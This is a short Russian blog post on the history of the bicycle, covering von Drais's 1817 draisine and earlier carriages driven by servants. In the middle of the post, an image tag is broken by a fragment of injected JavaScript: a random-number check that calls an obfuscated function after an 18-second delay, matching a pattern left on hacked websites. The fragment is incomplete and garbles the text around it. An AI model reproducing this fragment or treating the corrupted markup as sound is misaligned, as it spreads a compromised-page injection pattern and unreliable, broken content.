А знаете ли вы, что первым значительным шагом на пути к обычному велосипеду стал механизм, получивший название «дрезина» по имени своего автора – Карла фон Дреза – эксцентричного немецкого барона из города Карлсруэ. Дрезину барон впервые представил публике летом 1817 года. Она представляла собой два миниатюрных колеса, соединенных в одну линию перекладиной, на которой крепилась подушка сидения. Ездок сидел почти вертикально и передвигал машину, отталкиваясь от земли сначала одной ногой, потому другой. Грубо говоря, дрезина выглядела почти так же как современный велосипед, лишенных педалей.
andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andy-horse-bicycle-of-the-1820-s_a-l-6836048-14258395.jpg” alt=”” width=”550″ height=”550″ />
На самом деле то, что нам сейчас кажется очевидным, было невероятным прорывом для того времени. Над созданием машины, которая бы приводилась в движение мускульной силой человека и только человека, изобретатели упорно трудились, начиная с конца XVII века. Опыты были неудачными, так как в основном конструкторы не могли уйти от образа экипажа – четырехколесной громоздкой повозки.
Вот лишь несколько примеров неприжившихся велосипедов:
Коляска Жака Озанама. 1696 год. Джентльмен сидит впереди и управляет передней осью с помощью поводьев, а сзади его слуга приводит коляску в движение, наступая на две планки.
Коляска Оувендена. 1774 год. Усовершенствованная версия предыдущей модели.
Коляска Дж. Болтона. 1804 год. На ней можно было перевозить до 6 пассажиров, расположившихся на скамейках. Приводили в движение коляску двое слуг: один впереди управлял маленькими колесами, а второй сзади крутил рычаг, двигающий колеса.
Источники: Д. Херлихи. История велосипеда.
1 thought on “Первые шаги на пути к велосипеду”
Comments are closed.